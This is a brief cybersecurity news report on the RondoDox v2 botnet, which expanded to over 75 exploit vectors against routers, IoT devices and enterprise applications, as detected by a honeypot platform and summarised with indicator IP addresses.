Rondodox Botnet Updated Their Arsenal With 650% More Exploits...

A sophisticated evolution of the RondoDox botnet has emerged with a staggering 650% increase in exploitation capabilities, marking a significant escalation in the threat landscape for both enterprise and IoT infrastructure.

First documented by FortiGuard Labs in September 2024, the original RondoDox variant focused narrowly on DVR systems with just two exploit vectors.

The newly discovered RondoDox v2, however, demonstrates a dramatic expansion with over 75 distinct exploitation vectors targeting everything from legacy routers to modern enterprise applications.

This evolution represents a fundamental shift in botnet development strategy, bridging the gap between opportunistic IoT exploitation and targeted enterprise compromise.

The malware was detected on October 30, 2025, through honeypot telemetry when research infrastructure began receiving automated exploitation attempts from IP address 124.198.131.83 originating from New Zealand.

The attack pattern immediately distinguished itself through its volume and sophistication, deploying 75 distinct exploit payloads in rapid succession.

Each payload attempted command injection vectors targeting router and IoT vulnerabilities, with all payloads downloading malicious scripts from the command-and-control server at 74.194.191.52.

Unusually, the threat actor embedded an open attribution signature—[email protected]—directly into User-Agent strings, marking a departure from the anonymous operational security typically employed by botnet operators.

Beelzebub analysts identified the malware through their AI-native deception platform, which captured the complete attack chain and enabled comprehensive technical analysis of the botnet’s capabilities.

RondoDox v2 targets an extensive range of vulnerable devices spanning multiple vendor ecosystems and spanning over a decade of CVE history.

Source: Cybersecurity News